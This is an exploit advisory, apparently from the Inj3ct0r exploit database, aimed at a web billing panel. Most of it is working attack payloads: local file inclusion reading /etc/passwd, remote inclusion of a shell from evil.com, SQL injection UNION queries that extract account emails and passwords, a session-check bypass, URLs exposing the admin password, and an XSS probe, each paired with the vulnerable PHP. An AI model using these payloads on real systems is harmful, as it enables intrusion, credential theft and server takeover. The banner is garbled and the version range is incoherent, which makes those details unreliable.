1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3
Local Include Exploit:
/members.php?page=/…/…/…/…/…/…/…/…/…/…/etc/passwd%00
Vulnerable code:
// member_template.html
<?
include("member_$page.html");
?>
Remote Include Exploit:
/admin/?page=http://evil.com/shell.php?
Vulnerable code:
// /admin/template.html
include("$page$page_ext");
Sql Inj3ct0r Exploit:
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun
t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH
ERE+account_id=1%20–%20&session_id=you session_id
and
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun
t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH
ERE+account_id=1%20–%20&session_id=-1'+OR+login_logged=0x59%20–%20
Vulnerable code:
// member_orders_view.html
$db = new ps_DB;
$q = "SELECT * FROM orders WHERE order_id='$order_id' AND
order_account_id='$account_id' ORDER BY order_id";
Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path
Vulnerable code:
// member_static.thml
<? echo setup($content);?>
// functions.php
function setup($field) {
$db = new ps_DB;
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";
$db->query($q);
$db->next_record();
$ret = $db->f("setup_$field");
return $ret;
}
$db->query($q);
SQL-Inj3ct0r entry under randomly Account
members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20
Vulnerable code:
// member_account.html
$pass = is_logged($session_id);
// functions.php
function is_logged($session_id) {
$db = new ps_DB;
$q = "SELECT * FROM login WHERE login_id = '$session_id'";
$db->query($q);
$db->next_record();
$ret = $db->f("login_logged");
return $ret;
}
Xss Exploit:
/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>